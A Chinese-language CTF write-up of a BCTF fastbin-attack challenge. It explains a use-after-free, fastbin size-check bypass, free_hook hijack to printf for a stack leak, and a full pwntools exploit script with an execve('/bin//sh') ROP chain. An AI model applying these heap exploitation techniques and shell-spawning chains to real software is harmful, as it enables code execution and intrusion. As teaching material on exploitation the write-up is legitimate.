fastbin attack 利用

这也算是给自己补补堆溢出的姿势吧。

题目是一题来自bctf二月场的fastbin attack 非常经典的一题教学题,当时由于知识点没有get到,所以没做出来,一直放桌面,最近闲太碍眼了,开始日。

首先补一波fast bin attack的姿势,参考自freebuf:http://www.freebuf.com/news/88660.html

基本上看着这个就能做出题目了。

这题涉及到了两个考点:1、UAF 姿势;2、fastbin attack 的姿势

注意点是,malloc 从 fastbin 中取 chunk 时会检查 chunk 的 size 字段,如果大小不符合就会报错,就像下面这样。
1.png
所以需要使待malloc的fast chunk内的size符合要求。。(BTW chunk结构不多说了,自己去百度)这一般情况下需要自己去构造,不过这题例外,题目给出了利用点,即地址为0x6C4Aa0 ,所以说教学题。。很经典。。。

接着我们就可以任意地址写啦~~,不过我们的目的是要拿到shell,这题是静态编译的,所以我们可以考虑下用ropchain来拿shell

需要用rop的话,栈内的数据必须是我们可控的,目前手里有个任意地址写的漏洞,但是我们不知道栈的地址,所以我们接下去要做的就是拿到栈地址,需要有个函数来泄露栈地址。这边将free_hook修改成printf函数的地址,在调用free的时候会跳转到printf执行。泄露栈地址之后,将我们的rop写入栈,并执行。exp如下

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2017-04-06 07:15:19
# @Author : WinterSun (511683586@qq.com)
# @Link : https://Winter3un.github.io/
from pwn import *
context(log_level="debug")  # pwntools: echo every send/recv on the terminal while developing
DEBUG = 1
if DEBUG:
    # Local run: spawn the challenge binary and attach gdb with a breakpoint
    # at 0x40141B, then continue (the gdb command string is "b*0x40141B\nc").
    p = process('./fast-fast-fast')
    gdb.attach(p,"b*0x40141B\nc")
# else:
# p = remote()   # NOTE: no host/port given on the page; the remote path is not runnable as written
def sl(data):
    """Send `data` plus a newline to the target (pwntools `sendline`)."""
    p.sendline(data)
def sd(data):
    """Send `data` to the target as-is, without a trailing newline."""
    p.send(data)
def ru(data):
    """Read from the target up to and including `data`; return what was read."""
    received = p.recvuntil(data)
    return received
def create_fast(data):
    """Walk the program menu to create the fast chunk with contents `data`.

    Answers, in order: "1" after the "saysecret" prompt (fast chunk menu),
    "1" after the "delet" prompt (create), then `data` after the next newline.
    """
    dialogue = (
        ("saysecret\n", "1"),
        ("delet\n", '1'),
        ("\n", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
def edit_fast(data):
    """Walk the program menu to overwrite the fast chunk's contents with `data`.

    Answers, in order: "1" after "saysecret" (fast chunk menu), "2" after
    "delet" (edit), then `data` after the next newline.
    """
    dialogue = (
        ("saysecret\n", "1"),
        ("delet\n", '2'),
        ("\n", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
def del_fast():
    """Walk the program menu to free the fast chunk ("1" then "3")."""
    dialogue = (
        ("saysecret\n", "1"),
        ("delet\n", '3'),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
def create_small(data):
    """Walk the program menu to create the small chunk with contents `data`.

    Answers, in order: "2" after "saysecret" (small chunk menu), "1" after
    "delet" (create), then `data` after the next newline.
    """
    dialogue = (
        ("saysecret\n", "2"),
        ("delet\n", '1'),
        ("\n", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
def edit_small(data):
    """Walk the program menu to overwrite the small chunk's contents with `data`.

    Answers, in order: "2" after "saysecret" (small chunk menu), "2" after
    "delet" (edit), then `data` after the next newline.
    """
    dialogue = (
        ("saysecret\n", "2"),
        ("delet\n", '2'),
        ("\n", data),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
def del_small():
    """Walk the program menu to free the small chunk ("2" then "3")."""
    dialogue = (
        ("saysecret\n", "2"),
        ("delet\n", '3'),
    )
    for prompt, answer in dialogue:
        ru(prompt)
        sl(answer)
def say():
    """Choose menu item "3" after the "saysecret" prompt."""
    ru("saysecret\n")
    sl("3")
def edit(addr,data):
    """Arbitrary write primitive: store `data` at address `addr`.

    The fast chunk is first overwritten with a three-qword record
    (1, 0xFB0, addr); the original comment only says this "changes the
    small chunk", so presumably the record is the small chunk's bookkeeping
    (flag, size, data pointer) — confirm in gdb. Editing the small chunk
    afterwards then writes `data` through the redirected pointer.
    """
    fake_small_record = p64(1) + p64(0xFB0) + p64(addr)
    edit_fast(fake_small_record)  # change small chunk
    edit_small(data)
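def getchain():
    """Build the ROP chain that the final `edit(stack_addr, ...)` writes onto the stack.

    Reading the gadget comments: "/bin//sh" is stored at .data (0x6c1060)
    and a NULL qword right after it (0x6c1068); rdi is then pointed at the
    string and rsi/rdx at the NULL qword (empty argv/envp arrays); rax is
    zeroed and counted up to 59 (0x3b, the x86-64 execve syscall number)
    with a repeated ``add rax, 1`` gadget; the chain ends in ``syscall``.
    All gadget addresses are the ones the writeup lists for the static
    ./fast-fast-fast binary and are specific to that build.

    Returns:
        bytes: 76 little-endian qwords (608 bytes).

    Fix: the original concatenated ``struct.pack`` output onto a ``''``
    literal (and the ``'/bin//sh'`` str), which raises TypeError on
    Python 3. Building from ``b''`` pieces yields the same bytes on
    Python 2 and also runs on Python 3.
    """
    from struct import pack

    def q(value):
        # One little-endian 64-bit stack slot.
        return pack('<Q', value)

    # 59 == 0x3b == __NR_execve on x86-64; rax is zeroed by the xor just before.
    execve_syscall_nr = 59

    parts = [
        q(0x0000000000401b97),  # pop rsi ; ret
        q(0x00000000006c1060),  # @ .data
        q(0x000000000044d8e4),  # pop rax ; ret
        b'/bin//sh',
        q(0x00000000004714a1),  # mov qword ptr [rsi], rax ; ret
        q(0x0000000000401b97),  # pop rsi ; ret
        q(0x00000000006c1068),  # @ .data + 8
        q(0x000000000041c3cf),  # xor rax, rax ; ret
        q(0x00000000004714a1),  # mov qword ptr [rsi], rax ; ret
        q(0x0000000000401a83),  # pop rdi ; ret
        q(0x00000000006c1060),  # @ .data
        q(0x0000000000401b97),  # pop rsi ; ret
        q(0x00000000006c1068),  # @ .data + 8
        q(0x0000000000437835),  # pop rdx ; ret
        q(0x00000000006c1068),  # @ .data + 8
        q(0x000000000041c3cf),  # xor rax, rax ; ret
    ]
    # add rax, 1 ; ret — repeated 59 times (the original spelled out each line)
    parts.append(q(0x0000000000464120) * execve_syscall_nr)
    parts.append(q(0x0000000000464e75))  # syscall ; ret
    return b''.join(parts)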
# Exploit sequence. Order matters: the heap operations below set up the
# UAF / fastbin state the writeup describes, so do not reorder them.
create_fast("aaa")
del_fast()
create_small("aaa")
del_fast()  # fast chunk freed again after the small create: presumably the UAF step — verify in gdb
create_fast("aaa")
del_fast()
# Writeup: 0x6C4Aa0 is the address the challenge provides whose size field
# passes malloc's fastbin size check. Presumably this write lands in the
# freed fast chunk's fd so the next fast allocation is served from there.
edit_small(p64(0x6C4Aa0))
say()
create_fast(p64(0x6C4A80))
# Writeup: point free_hook at printf so free() jumps to printf.
# 0x6C3750 / 0x4082A0 presumably are __free_hook and printf in this static
# binary — confirm against the binary's symbols.
edit(0x6C3750,p64(0x4082A0))
# Format string placed in the small chunk: freeing it now calls printf on
# its contents; "%8$llX" prints the 8th vararg slot, a stack value.
edit(0x6C2710,"%8$llX")
del_small()
# Parse the first 12 hex digits of the leaked value and subtract a fixed
# offset to reach the target stack slot. NOTE(review): %llX prints no
# leading zeros, so a leak shorter than 12 digits would make int() raise
# ValueError (or mis-parse); the script does not check for that.
stack_addr = int(ru("\n")[:12],16)-0x18
print "stack_addr="+hex(stack_addr)   # Python 2 print statement
# Write the ROP chain over the stack; presumably it runs on the next return.
edit(stack_addr,getchain())
p.interactive()
